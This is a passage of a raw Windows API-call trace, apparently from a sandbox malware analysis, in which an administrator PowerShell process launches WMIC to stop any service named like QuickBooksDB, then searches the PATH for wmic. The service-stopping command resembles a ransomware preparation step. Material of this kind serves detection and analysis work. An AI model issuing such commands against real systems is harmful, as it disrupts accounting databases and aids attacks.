ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1ff0a0 [0255.902] FindNextFileW (in: hFindFile=0x1ff0a0, lpFindFileData=0x1c84d090 | out: lpFindFileData=0x1c84d090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0255.903] FindClose (in: hFindFile=0x1ff0a0 | out: hFindFile=0x1ff0a0) returned 1 [0255.903] SetErrorMode (uMode=0x1) returned 0x1 [0255.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c84d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0255.903] SetErrorMode (uMode=0x1) returned 0x1 [0255.903] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c84d3b0 | out: lpFileInformation=0x1c84d3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0255.903] SetErrorMode (uMode=0x1) returned 0x1 [0255.904] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0255.904] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c84d598, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84d598) returned 0x4550 [0255.905] CoTaskMemFree (pv=0x1b9b1040) [0255.905] GetConsoleWindow () returned 0x5011e [0255.906] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0255.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0255.906] CoTaskMemFree (pv=0x2af8c0) [0255.906] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0255.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0255.906] CoTaskMemFree (pv=0x2af8c0) [0255.906] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice", pNumArgs=0x1c84d5e0 | out: pNumArgs=0x1c84d5e0) returned 0x28a430*="" [0255.906] lstrlenW (lpString="path") returned 4 [0255.906] CoTaskMemAlloc (cb=0xc) returned 0x1b9f1100 [0255.906] RtlMoveMemory (in: Destination=0x1b9f1100, Source=0x28a472, Length=0xa | out: Destination=0x1b9f1100) [0255.906] CoTaskMemFree (pv=0x1b9f1100) [0255.906] lstrlenW (lpString="Win32_Service") returned 13 [0255.906] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1040 [0255.906] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1040) [0255.906] CoTaskMemFree (pv=0x1b9b1040) [0255.906] lstrlenW (lpString="where") returned 5 [0255.906] CoTaskMemAlloc (cb=0xe) returned 0x1b9f1100 [0255.907] RtlMoveMemory (in: Destination=0x1b9f1100, Source=0x28a498, Length=0xc | out: Destination=0x1b9f1100) [0255.907] CoTaskMemFree (pv=0x1b9f1100) [0255.907] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0255.907] CoTaskMemAlloc (cb=0x3c) returned 0x1b9c8560 [0255.907] RtlMoveMemory (in: Destination=0x1b9c8560, Source=0x28a4a4, Length=0x3a | out: Destination=0x1b9c8560) [0255.907] CoTaskMemFree (pv=0x1b9c8560) [0255.907] lstrlenW (lpString="call") returned 4 [0255.907] CoTaskMemAlloc (cb=0xc) returned 0x1b9f1100 [0255.907] RtlMoveMemory (in: Destination=0x1b9f1100, Source=0x28a4de, Length=0xa | out: Destination=0x1b9f1100) [0255.907] CoTaskMemFree (pv=0x1b9f1100) [0255.907] lstrlenW (lpString="stopservice") returned 11 [0255.907] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1040 [0255.907] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x28a4e8, Length=0x18 | out: Destination=0x1b9b1040) [0255.907] CoTaskMemFree (pv=0x1b9b1040) [0255.907] LocalFree (hMem=0x28a430) returned 0x0 [0255.907] CoTaskMemAlloc (cb=0x804) returned 0x1b9f1790 [0255.908] GetConsoleTitleW (in: lpConsoleTitle=0x1b9f1790, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0255.908] CoTaskMemFree (pv=0x1b9f1790) [0255.908] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0255.908] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c84d540*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x308b020 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice", lpProcessInformation=0x308b020*(hProcess=0x3e8, hThread=0x3e4, dwProcessId=0xafc, dwThreadId=0xa48)) returned 1 [0255.912] CoTaskMemFree (pv=0x253f20) [0255.913] CloseHandle (hObject=0x3e4) returned 1 [0255.913] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0255.913] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c84d5e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84d5e8) returned 0x4550 [0255.916] CoTaskMemFree (pv=0x1b9b1040) [0255.916] GetCurrentProcess () returned 0xffffffffffffffff [0255.916] GetCurrentProcess () returned 0xffffffffffffffff [0255.916] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c84d6c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c84d6c8*=0x3e4) returned 1 [0256.846] CloseHandle (hObject=0x3e4) returned 1 [0256.847] GetExitCodeProcess (in: hProcess=0x3e8, lpExitCode=0x1c84d738 | out: lpExitCode=0x1c84d738*=0x0) returned 1 [0256.847] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0256.848] CloseHandle (hObject=0x3e8) returned 1 [0256.849] SetEvent (hEvent=0x678) returned 1 [0256.849] SetEvent (hEvent=0x610) returned 1 [0256.849] SetEvent (hEvent=0x614) returned 1 [0256.849] SetEvent (hEvent=0x67c) returned 1 [0256.849] SetEvent (hEvent=0x68c) returned 1 [0256.849] SetEvent (hEvent=0x684) returned 1 [0256.850] SetEvent (hEvent=0x680) returned 1 [0256.850] SetEvent (hEvent=0x688) returned 1 [0256.850] SetEvent (hEvent=0x3cc) returned 1 [0256.850] CoUninitialize () Thread: id = 237 os_tid = 0x52c [0256.881] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0256.884] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0256.884] VirtualQuery (in: lpAddress=0x1c98d1c0, lpBuffer=0x1c98e080, dwLength=0x30 | out: lpBuffer=0x1c98e080*(BaseAddress=0x1c98d000, AllocationBase=0x1c000000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0256.886] VirtualQuery (in: lpAddress=0x1c98d470, lpBuffer=0x1c98e330, dwLength=0x30 | out: lpBuffer=0x1c98e330*(BaseAddress=0x1c98d000, AllocationBase=0x1c000000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0256.890] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0256.890] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0256.891] CoTaskMemFree (pv=0x2af8c0) [0256.891] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0256.891] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0256.891] CoTaskMemFree (pv=0x2af8c0) [0256.891] CoTaskMemAlloc (cb=0x20e) returned 0x2bd5f0 [0256.891] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bd5f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0256.892] CoTaskMemFree (pv=0x2bd5f0) [0256.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.892] SetErrorMode (uMode=0x1) returned 0x1 [0256.892] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.893] SetErrorMode (uMode=0x1) returned 0x1 [0256.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.893] SetErrorMode (uMode=0x1) returned 0x1 [0256.893] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.894] SetErrorMode (uMode=0x1) returned 0x1 [0256.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.894] SetErrorMode (uMode=0x1) returned 0x1 [0256.894] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.894] SetErrorMode (uMode=0x1) returned 0x1 [0256.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.895] SetErrorMode (uMode=0x1) returned 0x1 [0256.895] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.895] SetErrorMode (uMode=0x1) returned 0x1 [0256.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.896] SetErrorMode (uMode=0x1) returned 0x1 [0256.896] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.896] SetErrorMode (uMode=0x1) returned 0x1 [0256.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.897] SetErrorMode (uMode=0x1) returned 0x1 [0256.897] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.897] SetErrorMode (uMode=0x1) returned 0x1 [0256.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.897] SetErrorMode (uMode=0x1) returned 0x1 [0256.897] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.898] SetErrorMode (uMode=0x1) returned 0x1 [0256.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.898] SetErrorMode (uMode=0x1) returned 0x1 [0256.898] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.899] SetErrorMode (uMode=0x1) returned 0x1 [0256.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.899] SetErrorMode (uMode=0x1) returned 0x1 [0256.899] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.899] SetErrorMode (uMode=0x1) returned 0x1 [0256.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.900] SetErrorMode (uMode=0x1) returned 0x1 [0256.900] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.900] SetErrorMode (uMode=0x1) returned 0x1 [0256.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.901] SetErrorMode (uMode=0x1) returned 0x1 [0256.901] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.901] SetErrorMode (uMode=0x1) returned 0x1 [0256.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.901] SetErrorMode (uMode=0x1) returned 0x1 [0256.901] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.902] SetErrorMode (uMode=0x1) returned 0x1 [0256.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.902] SetErrorMode (uMode=0x1) returned 0x1 [0256.902] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.902] SetErrorMode (uMode=0x1) returned 0x1 [0256.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.903] SetErrorMode (uMode=0x1) returned 0x1 [0256.903] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.903] SetErrorMode (uMode=0x1) returned 0x1 [0256.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0256.904] SetErrorMode (uMode=0x1) returned 0x1 [0256.904] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.904] SetErrorMode (uMode=0x1) returned 0x1 [0256.904] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.904] SetErrorMode (uMode=0x1) returned 0x1 [0256.905] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.905] SetErrorMode (uMode=0x1) returned 0x1 [0256.905] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.905] SetErrorMode (uMode=0x1) returned 0x1 [0256.905] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.906] SetErrorMode (uMode=0x1) returned 0x1 [0256.906] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.906] SetErrorMode (uMode=0x1) returned 0x1 [0256.906] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.906] SetErrorMode (uMode=0x1) returned 0x1 [0256.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.907] SetErrorMode (uMode=0x1) returned 0x1 [0256.907] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0256.907] SetErrorMode (uMode=0x1) returned 0x1 [0256.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0256.908] SetErrorMode (uMode=0x1) returned 0x1 [0256.908] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c98d3a0 | out: lpFindFileData=0x1c98d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 